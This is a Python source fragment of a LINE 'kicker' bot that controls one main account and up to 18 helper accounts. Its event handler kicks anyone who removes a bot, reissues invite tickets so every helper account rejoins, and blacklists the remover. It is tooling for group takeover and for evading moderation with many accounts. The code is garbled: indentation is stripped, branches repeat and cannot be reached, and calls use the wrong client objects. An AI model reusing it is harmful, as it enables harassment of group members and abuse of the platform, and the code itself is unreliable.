#☆ Ķ͈̤̱͎̱̤̞̭͂̐͒́̀͗͞Ị̵̻̝̘͍͛̏̃͊̉͠ T̩͖͎̹̫͈̿̆̏́̑́S̤̲̯̤̹̲̲̘̏̋̈́̿͒ͅŲ̶̼̲̺̣̬̔̿͐̾̾͘Ṇ̶̨̛̲̭̝̲̝̪̎̾̈́͘͢͜͞É͎̱̺̜̐̀̿͘̕̕͢ B̴̡̛͈̖̺͖̙̝̩̞̐̂̀͂̏̚͟͠O̸̡̩̣̲̣̜̊̑̾̾͊̃͘͜ͅT Ç̵͔̟̫̰̮̺̟̥̂̋̂͋͐͛͑̔̚̚O̷̧̺̠̰̳̿́͆̕̕͠ͅ N̶͖̜̻̰͍̮̼̒́̐̑͒́̕ͅŢ̢̯̱͕̠͙̤̙̄̂͗̊̈́̕R̶̛̙̩̱̗̯͌̈͆̆Ơ̴̡͈̖̺͖̙̝̩̞̐̂̀͂̏̚͟͠L̸̡̩̣̲̣̜̊̑̾̾͊̃͘͜ͅ ☆
#""")
# ki5.sendText(msg.to,""" �� KITSUNE BOT [KB] \n\n key Only Kicker \n\n[Kb5 in]\n[5Aditname:]\n[B Cancel]\n[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Kb5 Gift]\n����[Kb5 bye]\n\n
#☆ Ķ͈̤̱͎̱̤̞̭͂̐͒́̀͗͞Ị̵̻̝̘͍͛̏̃͊̉͠ T̩͖͎̹̫͈̿̆̏́̑́S̤̲̯̤̹̲̲̘̏̋̈́̿͒ͅŲ̶̼̲̺̣̬̔̿͐̾̾͘Ṇ̶̨̛̲̭̝̲̝̪̎̾̈́͘͢͜͞É͎̱̺̜̐̀̿͘̕̕͢ B̴̡̛͈̖̺͖̙̝̩̞̐̂̀͂̏̚͟͠O̸̡̩̣̲̣̜̊̑̾̾͊̃͘͜ͅT Ç̵͔̟̫̰̮̺̟̥̂̋̂͋͐͛͑̔̚̚O̷̧̺̠̰̳̿́͆̕̕͠ͅ N̶͖̜̻̰͍̮̼̒́̐̑͒́̕ͅŢ̢̯̱͕̠͙̤̙̄̂͗̊̈́̕R̶̛̙̩̱̗̯͌̈͆̆Ơ̴̡͈̖̺͖̙̝̩̞̐̂̀͂̏̚͟͠L̸̡̩̣̲̣̜̊̑̾̾͊̃͘͜ͅ ☆
#""")
# ki6.sendText(msg.to,""" KITSUNE BOT [KB] \n\n key Only Kicker \n\n[Kb6 in]\n[6Aditname:]\n[B Cancel]\n[kick @]\n[Ban @]\n[kill]\n[BotChat]\n[Respons]\n[Kb6 Gift]\n[Kb6 bye]\n\n
#☆ Ķ͈̤̱͎̱̤̞̭͂̐͒́̀͗͞Ị̵̻̝̘͍͛̏̃͊̉͠ T̩͖͎̹̫͈̿̆̏́̑́S̤̲̯̤̹̲̲̘̏̋̈́̿͒ͅŲ̶̼̲̺̣̬̔̿͐̾̾͘Ṇ̶̨̛̲̭̝̲̝̪̎̾̈́͘͢͜͞É͎̱̺̜̐̀̿͘̕̕͢ B̴̡̛͈̖̺͖̙̝̩̞̐̂̀͂̏̚͟͠O̸̡̩̣̲̣̜̊̑̾̾͊̃͘͜ͅT Ç̵͔̟̫̰̮̺̟̥̂̋̂͋͐͛͑̔̚̚O̷̧̺̠̰̳̿́͆̕̕͠ͅ N̶͖̜̻̰͍̮̼̒́̐̑͒́̕ͅŢ̢̯̱͕̠͙̤̙̄̂͗̊̈́̕R̶̛̙̩̱̗̯͌̈͆̆Ơ̴̡͈̖̺͖̙̝̩̞̐̂̀͂̏̚͟͠L̸̡̩̣̲̣̜̊̑̾̾͊̃͘͜ͅ ☆
#""")
#-----------------------------------------------
elif msg.text in ["Welcome","wc","welcome","Wc"]:
    # Greet the group and name its creator.
    ginfo = cl.getGroup(msg.to)
    cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
    cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
elif "Bc " in msg.text:
    # Echo the text after "Bc " through assist bot 1.
    bctxt = msg.text.replace("Bc ","")
    ki.sendText(msg.to,(bctxt))
elif "Say " in msg.text:
    # Echo the text after "Say " through every active assist bot.
    bctxt = msg.text.replace("Say ","")
    ki.sendText(msg.to,(bctxt))
    ki2.sendText(msg.to,(bctxt))
    # ki3.sendText(msg.to,(bctxt))
    # ki4.sendText(msg.to,(bctxt))
    # ki5.sendText(msg.to,(bctxt))
    # ki6.sendText(msg.to,(bctxt))
elif msg.text.lower() == 'ping':
    # Liveness check: each active assist bot replies "Ping ".
    ki.sendText(msg.to,"Ping ")
    ki2.sendText(msg.to,"Ping ")
    # ki3.sendText(msg.to,"Ping ")
    # ki4.sendText(msg.to,"Ping ")
    # ki5.sendText(msg.to,"Ping ")
    # ki6.sendText(msg.to,"Ping ")
#-----------------------------------------------
#-----------------------------------------------
if op.type == 19:
try:
if op.param3 in mid:
if op.param2 in kimid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
ki.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in mid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = ki2.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
ki2.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in kimid:
if op.param2 in ki2mid:
G = ki2.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
else:
G = cl.getGroup(op.param1)
ki2.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki2.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in kimid:
if op.param2 in mid:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = cl.getGroup(op.param1)
cl.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki2mid:
if op.param2 in kimid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki2mid:
if op.param2 in mid:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
else:
G = cl.getGroup(op.param1)
cl.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki2.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki6mid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki8mid:
if op.param2 in ki7mid:
G = ki7.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki7.updateGroup(G)
else:
G = ki7.getGroup(op.param1)
ki7.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki7.updateGroup(G)
Ticket = ki7.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki7.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in kimid:
if op.param2 in ki7mid:
G = ki8.getGroup(op.param1)
G.preventJoinByTicket = False
ki8.updateGroup(G)
Ticket = ki8.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki8.updateGroup(G)
else:
G = ki8.getGroup(op.param1)
ki8.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki8.updateGroup(G)
Ticket = ki8.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in kimid:
if op.param2 in ki9mid:
G = ki10.getGroup(op.param1)
G.preventJoinByTicket = False
ki10.updateGroup(G)
Ticket = ki10.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki10.updateGroup(G)
else:
G = ki10.getGroup(op.param1)
ki10.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki10.updateGroup(G)
Ticket = ki10.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki10mid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki2.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki7.updateGroup(G)
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
elif op.param3 in ki11mid:
if op.param2 in ki10mid:
G = ki10.getGroup(op.param1)
G.preventJoinByTicket = False
ki10.updateGroup(G)
Ticket = ki10.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki10.updateGroup(G)
else:
G = ki10.getGroup(op.param1)
ki10.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki10.updateGroup(G)
Ticket = ki10.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
ki6.acceptGroupInvitationByTicket(op.param1,Ticket)
ki7.acceptGroupInvitationByTicket(op.param1,Ticket)
ki8.acceptGroupInvitationByTicket(op.param1,Ticket)
ki9.acceptGroupInvitationByTicket(op.param1,Ticket)
ki10.acceptGroupInvitationByTicket(op.param1,Ticket)
ki11.acceptGroupInvitationByTicket(op.param1,Ticket)
ki12.acceptGroupInvitationByTicket(op.param1,Ticket)
ki13.acceptGroupInvitationByTicket(op.param1,Ticket)
ki14.acceptGroupInvitationByTicket(op.param1,Ticket)
ki15.acceptGroupInvitationByTicket(op.param1,Ticket)
ki16.acceptGroupInvitationByTicket(op.param1,Ticket)
ki17.acceptGroupInvitationByTicket(op.param1,Ticket)
ki18.acceptGroupInvitationByTicket(op.param1,Ticket)
